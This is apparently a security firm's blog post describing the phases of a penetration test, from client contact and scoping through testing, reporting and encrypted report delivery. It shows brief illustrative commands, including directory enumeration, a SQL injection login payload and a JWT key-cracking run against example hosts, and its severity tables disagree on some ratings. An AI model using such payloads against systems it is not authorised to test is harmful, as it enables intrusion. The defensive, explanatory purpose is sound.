From First Contact to Final Report: Inside Our Penetration Testing Process
A step-by-step walkthrough of how a professional penetration testing engagement works - from the initial client conversation through scoping, active testing, and secure report delivery.
Written by
KleoSEC Team
Published
February 12, 2026
Reading time
8 min read
KleoSEC Team
Most organizations know they need a penetration test. Far fewer understand what actually happens during one. The process is often perceived as a black box - you hand over access, wait a few weeks, and receive a PDF full of findings. But a professional pentest is a structured, collaborative engagement with clear phases, constant communication, and rigorous methodology.
In this post, we'll walk through every stage of a typical KleoSEC penetration testing engagement, from the moment a client reaches out to the second we hit "Send Securely" on the final report.
The Client Reaches Out
Every engagement starts the same way: someone has a security concern.
Maybe it's a CEO preparing for a product launch who needs assurance that the platform won't be compromised on day one. Maybe it's a compliance requirement from a client or regulator. Or maybe a recent breach in the industry has made the board nervous. Whatever the trigger, the first step is always a conversation.
A typical initial request looks something like this:
"We need a comprehensive security assessment before our platform launch. Can you help?"
Our response is straightforward. We schedule a kick-off call to understand the business context, technical landscape, and what the client is most concerned about. Before any technical work begins, we handle the essentials:
- NDA signed - mutual confidentiality is non-negotiable
- Kick-off call - we meet the stakeholders and technical team
- Timeline agreed - both sides align on dates, communication channels, and escalation procedures
This phase is short but critical. It sets the tone for the entire engagement. A pentest is a partnership, not a transaction, and building trust early makes everything that follows more effective.
Scoping & Planning
Scoping is where the engagement takes shape. This is a collaborative process - we work directly with the client's technical team to define exactly what's in scope and how we'll approach it.
The conversation usually goes like this:
Client: "We need a thorough security assessment before our public launch."
KleoSEC: "Understood. Which systems should be in scope?"
Client: "Our main web app, the REST API, and the admin panel."
KleoSEC: "Perfect. Here's the proposed scope."
From there, we formalize the target list. For a typical web application engagement, this might include:
app.acme-digital.com— the primary web applicationapi.acme-digital.com— the backend REST APIadmin.acme-digital.com— the administrative interface
We also define the methodology and testing approach at this stage:
| Parameter | Decision |
|---|---|
| Standard | OWASP Top 10, OWASP ASVS |
| Framework | PTES (Penetration Testing Execution Standard) |
| Approach | Grey-box (authenticated + unauthenticated testing) |
| Duration | Typically 1–3 weeks depending on scope size |
Grey-box testing means we receive some level of access, usually user-level credentials and basic documentation, so we can test both as an external attacker and as an authenticated user. This approach maximizes coverage and reflects realistic threat scenarios, since many real-world attacks come from compromised accounts rather than purely external vectors.
The scoping phase produces a formal Statement of Work that both parties sign. No ambiguity, no scope creep, no surprises.
Active Penetration Testing
This is where the real work happens. Our security engineers systematically probe every target in scope, combining automated tooling with extensive manual testing. Automated scanners catch the low-hanging fruit, but the high-severity findings (the ones that actually matter) almost always come from manual analysis and creative thinking.
A typical testing session involves multiple attack vectors running in parallel:
Reconnaissance & Discovery
We start with enumeration - mapping out the attack surface. This includes directory brute-forcing, API endpoint discovery, technology fingerprinting, and analyzing client-side JavaScript for hidden endpoints or sensitive data.
$ gobuster -u app.acme-digital.com -w api-endpoints.txt
/api/v1/users [200]
/api/v1/admin [302]
/api/v1/debug [200]Every discovered endpoint gets catalogued and tested individually. It's meticulous work, but thoroughness is what separates a professional pentest from a vulnerability scan.
Exploitation & Validation
When we find a potential vulnerability, we don't just flag it - we prove it. Every finding is validated with a working proof of concept. If we claim there's a SQL injection, we demonstrate data extraction. If we find an authentication bypass, we show exactly what an attacker could access.
$ curl -d "user=admin'--" https://api.acme-digital.com/auth
{"error":"SQL syntax near..."}$ python3 jwt_crack.py --token eyJ...
[✓] Key found: "secret123"This validation step is essential. It eliminates false positives and gives the client's development team actionable evidence they can use to reproduce and fix the issue.
Findings as They Emerge
Throughout testing, findings are categorized by severity using the CVSS v4.0 scoring framework:
| Severity | Example Finding | CVSS |
|---|---|---|
| Critical | Authentication Bypass via SQL Injection | 9.8 |
| High | JWT Weak Signing Key | 7.5 |
| High | Stored XSS in Profile Editor | 9.1 |
| Medium | IDOR on User API Endpoint | 8.2 |
| Medium | Missing Rate Limiting on Login | 5.3 |
| Low | Verbose Error Messages | 3.1 |
For critical and high-severity findings, we follow a real-time notification protocol. If we discover something that poses an immediate risk, like an authentication bypass or remote code execution, we notify the client immediately rather than waiting for the final report. Security shouldn't wait for paperwork.
By the end of a typical engagement, we've run hundreds of individual tests across all in-scope targets. In one recent engagement, that looked like 18 confirmed findings across 247 tests on 12 distinct endpoints.
Documenting Everything
Raw findings are useless without context. That's why we built our own custom report platform - a purpose-built application for documenting penetration test results with the precision and detail that development teams actually need to fix things.
Every finding goes through a structured documentation process:
- Vulnerability description - full narrative describing the vulnerability, its impact, and the attack chain
- CVSS scoring - standardized severity ratings so teams can prioritize remediation
- Evidence/Proof of Concept - screenshots, request/response pairs, and proof-of-concept code attached directly to each finding
- Remediation guidance - specific, actionable fix recommendations tailored to the client's technology stack
We don't use generic templates or copy-paste descriptions from vulnerability databases. Every finding is written from scratch based on what we actually observed in the client's environment. This matters because a SQL injection in a user search endpoint requires different remediation than one in an admin login form, even though they share the same vulnerability class.
The Final Report
The deliverable is a comprehensive PDF report that serves two audiences: executives who need to understand risk at a strategic level, and engineers who need technical detail to fix the issues.
Executive Summary
The report opens with a high-level overview written in business language:
"During the assessment period, KleoSEC identified 18 vulnerabilities across the target web application infrastructure. 2 Critical and 5 High severity findings require immediate attention."
This is accompanied by a visual severity breakdown and an overall risk rating (in this case: HIGH, with an average CVSS score of 7.4). Executives can read this single page and understand exactly where the organization stands.
Technical Findings
Each finding gets its own detailed section with:
| ID | Title | Severity | CVSS |
|---|---|---|---|
| F-001 | SQL Injection - User Search | Critical | 9.8 |
| F-002 | Stored XSS - Profile Editor | Critical | 9.1 |
| F-003 | IDOR - /api/users/:id | High | 8.2 |
| F-004 | JWT Weak Signing Key | High | 7.5 |
| F-005 | Missing Rate Limiting | Medium | 5.3 |
| F-006 | Verbose Error Messages | Low | 3.1 |
Every entry includes the full description, reproduction steps, evidence (screenshots and HTTP requests/responses), impact analysis, and specific remediation steps.
Secure Delivery
A penetration test report contains some of the most sensitive information about an organization's security posture. Treating it casually would be irresponsible. That's why every report we deliver goes through a secure delivery process:
- AES-256 encryption - the report PDF is packaged and encrypted before it ever leaves our systems
- Secure transmission - delivered directly to authorized recipients only
- Access control - we confirm recipient identity before sharing decryption credentials through a separate channel
The decryption password is never sent in the same communication as the report itself. This ensures that even if an email is intercepted, the contents remain protected.
Once the report is delivered, we schedule a findings walkthrough call where we review every finding with the client's technical team, answer questions, and discuss remediation priorities. Security is collaborative - the report is a starting point for fixing things, not an end in itself.
What Happens After
A good pentest doesn't end with the report. We offer remediation verification. Once the client's team has addressed the findings, we re-test the specific vulnerabilities to confirm they've been properly fixed. This closes the loop and gives the organization documented proof that identified risks have been mitigated.
For clients with ongoing security needs, we also provide continuous engagement models where we perform regular assessments as the application evolves, ensuring that new features and changes don't introduce fresh vulnerabilities.
Every penetration test is different. The targets change, the findings vary, and the technical challenges are unique. But the process - the discipline of structured scoping, methodical testing, thorough documentation, and secure delivery - stays consistent. It's what separates a professional security assessment from someone running a scanner and emailing you the output.
If your organization is preparing for a launch, facing a compliance requirement, or simply wants to understand its security posture, we'd be happy to walk you through how a KleoSEC engagement would work for your specific situation.
Written by
KleoSEC Team
SECURITY ASSESSMENT
Need a Security Audit?
Our team specializes in securing vibe-coded applications before launch.
Get Security Assessment